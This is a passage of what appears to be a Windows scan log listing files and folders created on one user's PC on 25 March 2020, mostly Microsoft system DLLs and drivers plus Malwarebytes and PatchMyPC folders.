2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\PatchMyPC
2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\Patch_My_PC,_LLC
2020-03-25 16:27 - 2020-03-25 16:27 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\cache
2020-03-25 16:10 - 2020-03-25 16:10 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbam
2020-03-25 16:09 - 2020-03-25 16:13 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-03-25 16:09 - 2020-03-25 16:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbamtray
2020-03-25 16:09 - 2020-03-25 16:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2020-03-25 16:08 - 2020-03-25 16:08 - 000000000 ____D C:\ProgramData\MB2Migration
2020-03-25 14:28 - 2016-09-02 09:40 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:35 - 000706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-03-25 14:28 - 2016-09-02 09:35 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-03-25 14:28 - 2016-09-02 09:31 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 001464320 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-03-25 14:28 - 2016-09-02 09:21 - 003944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:18 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:02 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-03-25 14:28 - 2016-09-02 08:58 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-03-25 14:28 - 2016-09-02 08:55 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-03-25 14:28 - 2016-06-06 10:50 - 001483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-03-25 14:28 - 2016-06-06 09:23 - 001176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-03-25 14:28 - 2016-05-13 16:07 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2020-03-25 14:28 - 2016-05-13 15:55 - 002607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-03-25 14:28 - 2016-05-13 15:52 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:38 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-03-25 14:28 - 2016-05-12 11:14 - 000862208 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 09:18 - 000572416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 07:05 - 000459640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2020-03-25 14:28 - 2016-05-12 07:05 - 000297984 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-12 07:04 - 000249352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-04 11:21 - 000114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2020-03-25 14:28 - 2016-05-04 11:17 - 003244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-03-25 14:28 - 2016-05-04 11:17 - 002365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-03-25 14:28 - 2016-05-04 09:04 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2020-03-25 14:28 - 2016-02-05 12:56 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\tbs.dll
2020-03-25 14:28 - 2016-02-05 12:54 - 000109568 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2020-03-25 14:28 - 2016-02-05 11:33 - 000015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbs.dll
2020-03-25 14:28 - 2015-06-03 14:21 - 000451080 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:02 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-03-25 14:27 - 2016-09-02 09:02 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-03-25 14:27 - 2016-09-02 09:01 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:57 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-03-25 14:27 - 2016-09-02 08:48 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-03-25 14:27 - 2016-05-12 11:14 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:16 - 000070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2020-03-25 14:27 - 2016-05-04 08:55 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2020-03-25 14:27 - 2015-07-22 18:02 - 001390592 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-03-25 14:27 - 2015-07-22 18:02 - 000879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2020-03-25 14:27 - 2015-07-22 11:53 - 000635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2020-03-25 14:27 - 2015-07-22 10:48 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2020-03-25 14:26 - 2016-03-16 12:50 - 000156672 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000176128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2020-03-25 14:26 - 2015-12-16 08:38 - 000419928 _____ C:\Windows\SysWOW64\locale.nls
2020-03-25 14:26 - 2015-12-16 08:37 - 000419928 _____ C:\Windows\system32\locale.nls
2020-03-25 14:26 - 2015-10-29 11:50 - 000342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2020-03-25 14:26 - 2015-10-29 11:50 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2020-03-25 14:26 - 2015-05-25 12:19 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:18 - 000404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2020-03-25 14:26 - 2015-05-25 12:01 - 000092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:00 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2020-03-25 14:25 - 2016-08-29 09:31 - 014183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 012880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:04 - 003229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2020-03-25 14:25 - 2016-08-29 08:55 - 002972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2020-03-25 14:25 - 2016-07-07 09:36 - 001896168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-03-25 14:25 - 2016-07-07 09:08 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2020-03-25 14:25 - 2016-07-01 09:31 - 000976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:31 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2020-03-25 14:25 - 2016-07-01 08:56 - 000464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
